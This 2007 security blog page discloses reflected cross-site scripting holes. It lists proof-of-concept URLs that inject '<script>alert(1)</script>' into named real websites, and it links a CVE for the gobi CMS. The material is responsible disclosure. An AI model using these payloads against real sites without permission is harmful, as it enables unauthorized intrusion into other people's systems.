English

Friday, July 13. 2007

More XSS

I thought I'd give you some more (all have been informed months ago):

http://thepiratebay.org/search/"><script>alert(1)</script>
http://www.gruene.de/cms/default/dok/144/144640.dokumentsuche.htm?execute=1&suche_voll_starten=1&volltext_suchbegriff="><script>alert(1)</script>
http://www.terions.de/index_whois.php?ddomain="><script>alert(1)</script>
http://www.eselfilme.com/newsletter/newsletter.php?action=sign&email="><script>alert(1)</script>
http://www.region-stuttgart.de/sixcms/rs_suche/?_suche="><script>alert(1)</script>
http://reports.internic.net/cgi/whois?whois_nic="><script>alert(1)</script>&type=domain

Posted by Hanno Böck in English, Security, Webdesign at 04:28 | Comments (0) | Trackbacks (0)

Defined tags for this entry: javascript, security, websecurity, xss

Thursday, July 12. 2007

XSS on helma/gobi

I still have some unresolved xss vulnerabilities around. It seems to be common practice by many web application developers and web designers to ignore such information.

This time we have gobi, a cms system based on the quite popular javascript application server helma.

http://int21.de/cve/CVE-2007-3693-gobi.txt

More to come. As this xss stuff is far too easy (try some common strings in web forms, inform the author, publish some weeks later), I think about doing some kind of automated mechanism to search and report those vulnerabilities.

Posted by Hanno Böck in English, Security, Webdesign at 00:44 | Comments (0) | Trackbacks (0)

Defined tags for this entry: cve, gobi, helma, javascript, security, web, xss

(Page 1 of 1, totaling 2 entries)

Quicksearch

About me

Informationen über meine Arbeit als freier Journalist finden Sie hier.

Hanno Böck
mail: hanno@hboeck.de
jabber: hanno@hboeck.de
GPG/OpenPGP key

Hanno on Twitter

Impressum

Creative Commons

Unless noted otherwise, all content is CC Zero / public domain

Frontpage

Entries from July 2007